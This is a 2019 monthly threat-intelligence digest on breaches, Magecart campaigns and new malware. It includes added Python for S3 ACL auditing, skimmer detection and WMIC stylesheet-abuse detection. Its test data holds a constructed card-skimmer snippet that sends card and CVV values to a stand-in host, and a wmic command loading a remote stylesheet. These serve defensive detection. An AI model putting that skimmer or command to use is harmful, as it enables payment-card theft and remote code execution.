
Cyware Monthly Threat Intelligence


Monthly Threat Briefing Aug 1, 2019

The Good

As July comes to an end, let’s quickly recap all that happened in the cybersecurity world this month. July witnessed several cybersecurity advancements, security incidents, and the emergence of new threats. To begin with, let’s first glance through the good that happened in cyberspace. The National Security Agency (NSA) plans to establish a new cybersecurity division that will help defend the US against foreign cyber threats. The U.S. government announced plans to implement new DNS security measures for all .gov domains. Meanwhile, Samsung Electronics, South Korean telcos, and banks formed a consortium to build a blockchain network for mobile authentication services.

  • The U.S. government announced plans to implement new DNS security measures for all .gov domains to mitigate risks associated with future DNS hijacking attacks. This new initiative was prompted by a global DNS hijacking campaign alert issued by the National Cybersecurity and Communications Integration Center (NCCIC).

  • The National Security Agency (NSA) plans to establish a new cybersecurity division named ‘Cybersecurity Directorate’ that will help the US defend against foreign cyber threats. The new directorate is meant to share threat information with the NSA’s customers so they are equipped to defend themselves. It will become operational on October 1, 2019.

  • Toyota released an open-source testing tool named ‘PASTA’ (Portable Automotive Security Testbed) that tests a car’s vulnerability to hacking. This testing tool can be used by car manufacturers for their own research and development. PASTA is designed to simulate attacks and test for vulnerabilities and exploits, but not for hacking the vehicle while it is moving.

  • Fujitsu Laboratories announced the development of a digital identity exchange technology that uses blockchain to enhance trust while validating a user. This technology enables individual users and service businesses involved in online transactions to confirm the identity of the other parties. The technology is built on the Decentralized Identifier (DID) model.

  • Samsung Electronics, South Korean telcos, and banks formed a consortium to build a blockchain network for mobile authentication services. The consortium members are SK Telecom, KT, LG Uplus, KEB Hana Bank, and Woori Bank.

The Bad

This month witnessed numerous data breaches and cyber attacks that exposed the personal information of millions of people across the globe. Capital One suffered a massive data breach exposing the personal and credit card information of almost 106 million US and Canadian customers. Meanwhile, Magecart attackers were spotted in two different large-scale campaigns. The first breached almost 962 e-commerce stores in just 24 hours. In the second, Magecart attackers injected card skimmer code into JavaScript hosted on over 17,000 websites through misconfigured Amazon S3 buckets.

  • Capital One suffered a major data breach after a hacker exploited a configuration vulnerability in its web application firewall. This exposed the personal and credit card information of almost 100 million people in the United States and around 6 million people in Canada. The exposed data includes personal details, credit card data, transaction data, Social Security numbers, linked bank account numbers, and Social Insurance numbers of consumers and small businesses that applied for credit card products between 2005 and 2019.

  • Attackers hijacked 7-Eleven Japan’s 7pay customer accounts and made fraudulent charges against almost 900 customers, for a collective loss of ¥55 million ($510,000). The incident was caused by a security lapse in the design of the company's mobile payment app 7pay, which was launched on July 1, 2019.

  • The Administrative Office of Courts in the state of Georgia was hit by a ransomware attack that resulted in its servers being taken offline. The court agency also had its website shut down due to the attack. However, websites for Georgia Supreme Court and court clerks remained operational.

  • An unprotected MongoDB database exposed almost 188 million records of personal data sourced from Pipl and LexisNexis. Almost 800,000 records originated from LexisNexis which included names, addresses, gender, parental status, a short biography, family members, redacted emails, and information about the individual’s neighbors including full names, dates of birth, reputation scores, and addresses.

  • Attackers breached the Internet domain registry of ICS-Forth, impacting several .gr and .el domain owners whose domain names were stored in the compromised registry. Researchers identified the hacker group known as Sea Turtle as responsible for the attack against ICS-Forth.

  • Magecart attackers injected card skimming code into JavaScript files served to over 17,000 domains through misconfigured Amazon S3 buckets. Some of the affected websites are also listed in Alexa’s top 2,000 rankings. Researchers suggest that the threat actors behind this campaign scanned for misconfigured Amazon S3 buckets and the JavaScript files in them. After finding such files, they downloaded them, appended the card-skimming code, and wrote them back, which is possible only because the buckets allowed anonymous writes.

  • A large-scale Magecart campaign breached almost 962 e-commerce stores in a span of 24 hours, stealing customers’ payment card details including full credit card data, names, phone numbers, and addresses. The attackers inserted customized JavaScript into the e-commerce sites, essentially adding a fake credit card payment section to the checkout page.

  • The GitHub account of Canonical, the company behind Ubuntu, was compromised. The attackers created 11 new repositories under the official Canonical account. However, the organization confirmed that there was no evidence that any source code or sensitive information was impacted.

  • Hackers stole almost 110 databases containing the private data of millions of Bulgarians from the NRA network and leaked 57 databases to local news publications via emails containing download links. The leaked information contained personal identification numbers (PINs), names, home addresses and financial earnings of Bulgarians. Most of the information available in the databases dated back as far as 2007.

  • An international investigation revealed that the Chinese authorities are installing surveillance apps on the phones of some visitors at border crossings in the Xinjiang region as part of the government's mass surveillance program. The malicious surveillance app installed on visitors’ phones can extract emails, text messages, phone logs, contact information, calendar entries, and device information. The app can also scan the device for over 70,000 different files.

  • A database dump added to the Have I Been Pwned website contained the data of almost 101 million Evite users whose information was exposed in a data breach earlier this year. At the time, it was believed that approximately 10 million users were affected; the actual number is much larger.

  • Hackers gained unauthorized access to Sprint customer accounts using their account credentials via a Samsung website. The compromised information includes customers’ names, phone numbers, billing addresses, device types, device IDs, monthly recurring charges, subscriber IDs, account numbers, account creation dates, upgrade eligibility, and add-on services.

  • An unsecured database belonging to YouHodler exposed over 86 million records of user data including names, dates of birth, email addresses, addresses, phone numbers, passport numbers, passwords, credit card numbers, CVV numbers, bank details, and crypto wallet addresses. YouHodler acknowledged the data leak and secured the database by restricting public access.

  • Security researchers from Data Group discovered an unprotected server containing 250GB of data which was publicly accessible without any authentication. The unsecured server contained sensitive information of clients of various local banks. Even though the server is linked to more than one bank, a majority of the exposed details were related to a local bank named Banco Pan.

  • A Chinese cyberespionage group targeted several German firms including BASF, Siemens, and Henkel with Winnti malware. Apart from these German firms, Roche, Marriott, Lion Air, Sumitomo Corporation, and Shin-Etsu Chemical were also targeted by the group.

  • A hacker group named ‘0v1ru$’ breached SyTech, a contractor for the Russian Federal Security Service (FSB) and stole information about internal projects. The contractor had worked for FSB unit 71330 and with fellow contractor Quantum since 2009. The projects include Nautilus, Nautilus-S, Reward, Mentor, Hope, and Tax-3.

  • LaPorte County, Indiana, suffered a malware attack that disabled the county’s computer systems and email services. The county reported the matter to the FBI and informed other law enforcement agencies about the attack. It is working with security experts to respond to the attack, repair the affected systems, and improve security to prevent similar infections.

  • A misconfigured Elasticsearch cluster owned by the Public Security Department of Jiangsu Province, China, leaked two databases containing over 90 million citizen and business records. The leaky databases contained 58,364,777 public records and 33,708,010 business records. Public information includes names, dates of birth, genders, identity card numbers, location coordinates, as well as city information. The business records included business IDs, business types, location coordinates, city_open_id, and memos designed to track the owner of the business.
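The two Magecart items above share one pattern: a script that the shop serves to every visitor is altered at rest (in a world-writable S3 bucket) or at the checkout page, and the browser runs whatever it is handed. The following Python is an added example, not code from Cyware or from any of the affected sites. It shows two checks a site owner can run: an audit of an S3 bucket ACL for grants that let anyone write objects (the ACL has the shape returned by S3 GetBucketAcl, so the output of boto3's get_bucket_acl can be fed straight in), and a comparison of the script actually served against a known-good baseline, with appended code scanned for form-grabbing constructs. The bucket ACL, the baseline script, and the tampered script are constructed samples; the indicator list is an assumption of mine, a starting point rather than a signature set.

```python
"""Two checks against the Magecart tradecraft described above (added example):
1. audit an S3 bucket ACL for grants that let anyone write objects, and
2. compare JavaScript served to shoppers against a known-good baseline so
   that appended skimmer code is caught and an SRI hash can be pinned.

The ACL document and the script contents below are constructed samples,
not artifacts from the campaigns."""
import base64
import hashlib
import re

# S3's predefined groups that make a grant public.
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
# Permissions that let a grantee modify bucket contents or the ACL itself.
WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}


def risky_grants(acl):
    """Return (grantee_uri, permission) pairs that allow public writes.
    `acl` has the shape returned by S3 GetBucketAcl (boto3 get_bucket_acl)."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") == "Group" and uri in PUBLIC_GRANTEES:
            if grant.get("Permission") in WRITE_PERMISSIONS:
                findings.append((uri, grant["Permission"]))
    return findings


def sri_hash(content: bytes) -> str:
    """Subresource Integrity value for a script tag, e.g. 'sha384-...'."""
    digest = hashlib.sha384(content).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


# Constructs typical of form-grabbing skimmers: hooking submit events,
# reading card fields, encoding them, and shipping them off. (Assumed list.)
SKIMMER_INDICATORS = [
    r"addEventListener\(\s*['\"]submit['\"]",
    r"document\.forms",
    r"card|cvv|cvc|expir",
    r"btoa\(|encodeURIComponent\(",
    r"XMLHttpRequest|fetch\(|new Image\(",
]


def check_script(baseline: bytes, served: bytes) -> dict:
    """Compare a served script with its baseline.
    'status' is 'clean', 'appended' (baseline intact, code added at the end,
    the pattern seen in the S3 campaign) or 'modified' (anything else).
    For appended code the suffix and the matching indicators are returned."""
    if served == baseline:
        return {"status": "clean", "indicators": []}
    result = {"status": "modified", "indicators": []}
    if served.startswith(baseline):
        suffix = served[len(baseline):].decode("utf-8", errors="replace")
        result["status"] = "appended"
        result["appended"] = suffix
        result["indicators"] = [p for p in SKIMMER_INDICATORS
                                if re.search(p, suffix, re.IGNORECASE)]
    return result


# Constructed sample ACL: owner has full control, the world can read AND write.
SAMPLE_ACL = {
    "Owner": {"ID": "example-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "example-owner-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "WRITE"},
    ],
}

# Constructed baseline script and a copy with a skimmer appended to it.
BASELINE_JS = b"function initCart(){console.log('cart ready');}\n"
TAMPERED_JS = BASELINE_JS + (
    b"document.addEventListener('submit',function(e){"
    b"var f=e.target;var d=encodeURIComponent(f.card_number.value+'|'+f.cvv.value);"
    b"new Image().src='https://stats.example.invalid/c.gif?d='+btoa(d);});\n"
)

if __name__ == "__main__":
    print("public write grants:", risky_grants(SAMPLE_ACL))
    print("pin in <script integrity=...>:", sri_hash(BASELINE_JS))
    print("served script:", check_script(BASELINE_JS, TAMPERED_JS))
```

The SRI value is the durable fix for the hosting side: a `<script src=... integrity="sha384-...">` tag makes the browser refuse a script whose hash no longer matches, so an appended skimmer fails to load rather than running silently. The ACL audit catches the precondition the S3 campaign relied on; the `READ` grant alone is normal for a public asset bucket, the `WRITE` grant is the finding.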

New Threats

Several new malware, ransomware, vulnerabilities, and threat groups emerged this month. Trickbot trojan added a custom proxy module from IcedID. A malspam campaign that delivers Astaroth malware through fileless execution was spotted in the wild. Meanwhile, WhatsApp and Telegram were found to be impacted by a new flaw named ‘Media File Jacking’.

  • The Trickbot trojan was found deploying a custom proxy module derived from Bokbot, also known as IcedID. The module is based on IcedID’s web injection code. It is dropped separately as “shadnewDll” and comes with its own configuration file. The module acts as a local proxy server between the client and the online banking service and can serve a fake template for the bank the user requested in order to steal sensitive information.

  • Researchers uncovered a string of malware campaigns that leveraged the ‘Heaven’s Gate’ technique for evasion. The technique lets 32-bit malware running on a 64-bit Windows machine switch into 64-bit mode, so its API calls are hidden from security tools that only monitor the 32-bit code path. According to the researchers, one of the campaigns distributed the HawkEye Reborn keylogger. Other campaigns mainly distributed Remcos, Agent Tesla, or cryptocurrency mining trojans.

  • US Cyber Command issued an alert on Twitter about the exploitation of a known vulnerability in Microsoft Outlook. Tracked as CVE-2017-11774, the vulnerability is being exploited by threat actors to deploy malware on government networks. It was patched in the October 2017 Patch Tuesday updates, so affected systems are ones that never received that update.

  • New research revealed that WhatsApp and Telegram are impacted by a new flaw named ‘Media File Jacking’. The weakness arises from how received media files are stored by these messaging apps on the device’s external storage, where other apps with storage permission can alter them. It could allow attackers to manipulate and expose WhatsApp and Telegram media files before the user views them.

  • WannaLocker, a mobile derivative of WannaCry ransomware, has been enhanced with spyware, RAT, and banking trojan capabilities. Cybercriminals have been found using this all-in-one malware to target Brazilian banks and their customers.

  • A new campaign that delivers Astaroth malware through fileless execution was spotted by the Microsoft Defender ATP team. The campaign ran Astaroth directly in memory. The attackers relied on spear-phishing to spread the malware and leveraged the Windows Management Instrumentation Command-line (WMIC) tool to run scripts without dropping an executable to disk.

  • The Anubis banking trojan, which targets Android users, was back in a new campaign. Researchers detected two servers hosting 17,490 Anubis samples, detected as AndroidOS_AnubisDropper. Two of the analyzed samples were labeled ‘Operatör Güncellemesi’ and ‘Google Services’.

  • Researchers uncovered a new malspam campaign that delivers the Dridex banking trojan and RMS RAT via malicious Microsoft Office attachments. The phishing emails carried ZIP archives containing XLS (Microsoft Excel) documents disguised as fake eFax messages. The documents were embedded with a macro designed to download and launch the Dridex trojan and RMS RAT. Upon execution, Dridex collects credentials from web browsers while RMS RAT gives the attackers remote control of the infected systems.

  • The Turla APT group was spotted using a new malware dubbed ‘Topinambour’ in its recent campaign. Topinambour fingerprints compromised machines and uploads and executes further malicious files on them. The group spread Topinambour through trojanized installers of legitimate software such as SoftEther VPN, psiphon3, or Microsoft Office ‘activators’.

  • The developers of GandCrab are believed to be behind the Sodinokibi ransomware. In May, the group had announced the shutdown of the GandCrab RaaS operation. Separately, the FBI released master decryption keys that unlock files encrypted by GandCrab versions 4 through 5.2.

  • Researchers uncovered a vulnerability in the Facebook-owned social networking app Instagram. The vulnerability resided in the ‘password recovery’ feature of the mobile version of Instagram. It could allow attackers to reset the password of any Instagram account and take complete control of it.

  • Researchers analyzed a sample of the MegaCortex ransomware, which targets enterprises. The attackers behind the ransomware operate by gaining access to a target network and then compromising the Windows domain controller. After encrypting the compromised workstations, the ransomware demands a ransom ranging from 2-3 BTC to as much as 600 BTC.
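The Astaroth item above turns on one WMIC feature: `wmic.exe` accepts `/format:` with a path or URL to an XSL stylesheet, and a stylesheet that embeds script is executed inside the wmic process, so the payload never has to exist on disk as an executable. The following Python is an added example, not code from Cyware or from the Microsoft analysis. It runs detection logic over process-creation records and flags wmic invocations whose format argument is a remote URL, a stylesheet file, or a name that is not one of WMIC’s built-in formats; it also notes when wmic was spawned by an Office application, which is my own heuristic for the spear-phishing delivery described and not something the page states. The log lines are constructed samples in a simple tab-separated format (parent image, image, command line), not real telemetry or Astaroth artifacts.

```python
"""Detection logic for WMIC stylesheet abuse (added example).

wmic.exe /format:<x> loads an XSL stylesheet; a stylesheet that embeds
script runs inside wmic itself. The log lines below are constructed samples
in a simple tab-separated format, not real telemetry or Astaroth artifacts."""
import re

# Output formats that ship with WMIC; anything else names a file or a URL.
BUILTIN_FORMATS = {"csv", "hform", "htable", "list", "mof", "rawxml",
                   "table", "textvaluelist", "xml", "value"}
# Assumed heuristic: Office parents are unusual for wmic and fit phishing delivery.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
FORMAT_RE = re.compile(r"/format\s*:\s*(\"[^\"]+\"|'[^']+'|\S+)", re.IGNORECASE)


def parse_event(line: str) -> dict:
    """Parse one constructed record: parent image, image, command line."""
    parent, image, cmdline = line.split("\t", 2)
    return {"parent": parent, "image": image, "cmdline": cmdline}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def wmic_format_reasons(event: dict):
    """Return a list of reasons the event is suspicious, or None if benign."""
    if basename(event["image"]) != "wmic.exe":
        return None
    match = FORMAT_RE.search(event["cmdline"])
    if not match:
        return None
    target = match.group(1).strip("\"'")
    reasons = []
    if re.match(r"^(https?|ftp)://", target, re.IGNORECASE):
        reasons.append("remote stylesheet")
    elif target.lower().endswith(".xsl"):
        reasons.append("local stylesheet")
    elif target.lower() not in BUILTIN_FORMATS:
        # A bare non-builtin name is resolved to <name>.xsl from disk.
        reasons.append("non-builtin format name")
    parent = basename(event["parent"])
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by {parent}")
    return reasons or None


def detect(lines):
    """Return (record index, reasons) for every record that trips the logic."""
    findings = []
    for index, line in enumerate(lines):
        reasons = wmic_format_reasons(parse_event(line))
        if reasons:
            findings.append((index, reasons))
    return findings


# Constructed sample records: one benign wmic use, two abuses, one non-wmic.
SAMPLE_LOG = [
    "\t".join(["C:\\Windows\\System32\\cmd.exe",
               "C:\\Windows\\System32\\wbem\\WMIC.exe",
               "wmic os get caption /format:list"]),
    "\t".join(["C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
               "C:\\Windows\\System32\\wbem\\WMIC.exe",
               'wmic os get /format:"https://cdn.example.invalid/s.xsl"']),
    "\t".join(["C:\\Windows\\System32\\cmd.exe",
               "C:\\Windows\\System32\\wbem\\WMIC.exe",
               "WMIC.exe process get /FORMAT:C:\\Users\\Public\\out.xsl"]),
    "\t".join(["C:\\Windows\\explorer.exe",
               "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
               "powershell -NoProfile -Command Get-Date"]),
]

if __name__ == "__main__":
    for index, reasons in detect(SAMPLE_LOG):
        print(f"record {index}: {', '.join(reasons)}")
```

The built-in format list is the key to keeping the false-positive rate low: administrators do run `wmic ... /format:csv` or `/format:list` routinely, and those are left alone, while any format argument that resolves to a file, a URL, or an unknown stylesheet name is what the fileless chain needs.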
